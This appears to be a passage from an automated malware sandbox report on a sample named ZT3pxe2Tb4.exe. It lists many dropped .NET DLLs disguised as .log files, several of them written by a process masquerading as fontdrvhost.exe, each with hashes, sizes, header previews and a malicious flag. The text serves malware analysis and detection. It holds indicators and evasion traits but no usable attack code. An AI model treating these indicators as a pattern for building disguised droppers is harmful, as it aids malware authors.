                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\uvZrYWTP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):36352
                                                                  Entropy (8bit):5.668291349855899
                                                                  Encrypted:false
                                                                  SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                                  MD5:94DA5073CCC14DCF4766DF6781485937
                                                                  SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                                  SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                                  SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@....................................W.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......pi..T;...........g..x........................................................................................................................................................................XWJ..%.v0................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\uztLDTCs.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):70144
                                                                  Entropy (8bit):5.909536568846014
                                                                  Encrypted:false
                                                                  SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                                  MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                                  SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                                  SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                                  SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .................)... ...@....@.. ..............................8.....@..................................(..S....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H..............................................................................................................................................................................................NC>.$qK...X....J................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\wHLAFYKX.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.629584586954759
                                                                  Encrypted:false
                                                                  SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                                  MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                                  SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                                  SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                                  SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!................>.... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...D.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................ .......H........r..h?..........Lq..8....................................................................................................................................................................M..d..u7 ...jj.................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\wOXBumXW.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\wsOrhbIJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\xHZssejW.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):64000
                                                                  Entropy (8bit):5.857602289000348
                                                                  Encrypted:false
                                                                  SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                                  MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                                  SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                                  SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                                  SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ................N.... ... ....@.. .......................`......E.....@.....................................W.... .......................@....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................0.......H...........|...................................................................................................................................................................................7.pO`....<o ..F................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\xOrrZDRn.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\xgyKnYKq.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\xkYbKhNl.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):342528
                                                                  Entropy (8bit):6.170134230759619
                                                                  Encrypted:false
                                                                  SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                                  MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                                  SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                                  SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                                  SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l..d.........." .....2...........P... ...`....@.. ...................................@.................................LP..O....`............................................................................... ............... ..H............text....0... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............8..............@..B.................P......H............p..................................................................................................................................................................................GJ2....mj..R...................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\xvPIrmGV.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\yEAAOeyR.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):33280
                                                                  Entropy (8bit):5.634433516692816
                                                                  Encrypted:false
                                                                  SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                                  MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                                  SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                                  SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                                  SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...k..d...........!.....z............... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....y... ...z.................. ..`.rsrc................|..............@..@.reloc..............................@..B........................H.......@`..(9..........._......................................................................................................................................................................V.4...W..e..&&................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\ylQifTUJ.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38400
                                                                  Entropy (8bit):5.699005826018714
                                                                  Encrypted:false
                                                                  SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                                  MD5:87765D141228784AE91334BAE25AD743
                                                                  SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                                  SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                                  SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...c..d...........!..................... ........@.. ....................................@....................................O.................................................................................... ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Dm...?..........<l......................................................................................................................................................................Q[..u.......;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zReaumVj.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):40448
                                                                  Entropy (8bit):5.7028690200758465
                                                                  Encrypted:false
                                                                  SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                                  MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                                  SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                                  SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                                  SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..d...........!................n.... ........@.. ....................................@.....................................S.................................................................................... ............... ..H............text...t.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B................P.......H........k..@I...........k...........................................................................................................................................................................B._.@.;..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zTojkKNX.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zfzIrCEh.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):294912
                                                                  Entropy (8bit):6.010605469502259
                                                                  Encrypted:false
                                                                  SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                                  MD5:00574FB20124EAFD40DC945EC86CA59C
                                                                  SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                                  SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                                  SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....x............... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text....v... ...x.................. ..`.rsrc................z..............@..@.reloc...............~..............@..B.......................H........y...............Z..............................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

                                                                  C:\Users\user\Desktop\zldaSYtH.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):126976
                                                                  Entropy (8bit):6.057993947082715
                                                                  Encrypted:false
                                                                  SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                                  MD5:16B480082780CC1D8C23FB05468F64E7
                                                                  SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                                  SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                                  SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." ..................... ... ....@.. .......................`......:.....@.....................................O.... .......................@....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H...........(...........<...h.........................................................@.......0.................................................................................................................................Y........;~..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................

                                                                  C:\Users\user\Desktop\zntiAIEO.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):50176
                                                                  Entropy (8bit):5.723168999026349
                                                                  Encrypted:false
                                                                  SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                                  MD5:2E116FC64103D0F0CF47890FD571561E
                                                                  SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                                  SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                                  SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................... .......e....@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H............M...................................................................................................................................................................................Xg;.6.'.1. b9g................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zsrQNmVQ.log

                                                                  Download File
                                                                  Process:C:\Users\user\Desktop\ZT3pxe2Tb4.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zuGjoWSN.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):39936
                                                                  Entropy (8bit):5.660491370279985
                                                                  Encrypted:false
                                                                  SSDEEP:768:1Q8H1q0rErIq3y48wo5iJyNJZ+pkw82VhgwgKZ:brErIqxPJRkw/VOwbZ
                                                                  MD5:240E98D38E0B679F055470167D247022
                                                                  SHA1:49888CCED719AE78EE3BAE2959402749668AA1C6
                                                                  SHA-256:C200E1BE39C35F8E57A0E1E241723FDB956089BC8EAD1235042456C7A3C4AD28
                                                                  SHA-512:93C1B6396C65C9EDACEFD6606A9563935D3C1331454DA69FA75D9B1CCE4D102A5F1B27B63FC3A7E485A083D8DAB1E6C4ECD01DD3CFED9B58DA6F4E90CC4F2998
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...n..d...........!.................... ........@.. ....................................@.....................................K.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H........q...@.......... q...........................................................................................................................................................................-|{.3.g...p................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  C:\Users\user\Desktop\zzDSBAiP.log

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\fontdrvhost.exe
                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Category:dropped
                                                                  Size (bytes):38912
                                                                  Entropy (8bit):5.679286635687991
                                                                  Encrypted:false
                                                                  SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                                  MD5:9E910782CA3E88B3F87826609A21A54E
                                                                  SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                                  SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                                  SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                                  Malicious:true
                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!..................... ........@.. ....................................@.................................h...S.................................................................................... ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........k..hC...........j......................................................................................................................................................................`..~...CE.w#'..................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                                  \Device\Null

                                                                  Download File
                                                                  Process:C:\Windows\System32\w32tm.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):151
                                                                  Entropy (8bit):4.806609674329235
                                                                  Encrypted:false
                                                                  SSDEEP:3:VLV993J+miJWEoJ8FXVWau4WmvpuVuWxRvj:Vx993DEUwXPk4c
                                                                  MD5:A29ACE2D99978DBFEF3D67A425745BC7
                                                                  SHA1:86E98F3C099A62118C7ABDDBFB623A0D58A285DD
                                                                  SHA-256:902FFEA081704AC6647F828CADBFBB737B3D64BA1E84C31C9A086BFBA854B686
                                                                  SHA-512:64E694C07062E0A8B42A4A92317809E8BC209BCD2B2CDBCDB3BEFA592B9E2C8E449893EEAF6FA8C21F78F3437D173F792D764289B38E1050B3F4532BA22B356D
                                                                  Malicious:false
                                                                  Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 29/03/2024 09:09:33..09:09:33, error: 0x80072746.09:09:38, error: 0x80072746.

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):7.822210869380534
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  File name:ZT3pxe2Tb4.exe
                                                                  File size:3'672'576 bytes
                                                                  MD5:4164d5955c244ff266c1cc41013fe21a
                                                                  SHA1:cd4b6caab8b3762d3af3b7ad738f51d2e92c2d34
                                                                  SHA256:138905d6721c1e6b174b6f61154a938565c9bd5c6b5b0abe8274054bf151da9c
                                                                  SHA512:fa321be81dcb76d26aca25e1aa82145204acdbd94026556f1031b6d29176096abf7de47c36dabd8a4c1c578b3bea04e31a639481fb3890c593e597720e14e444
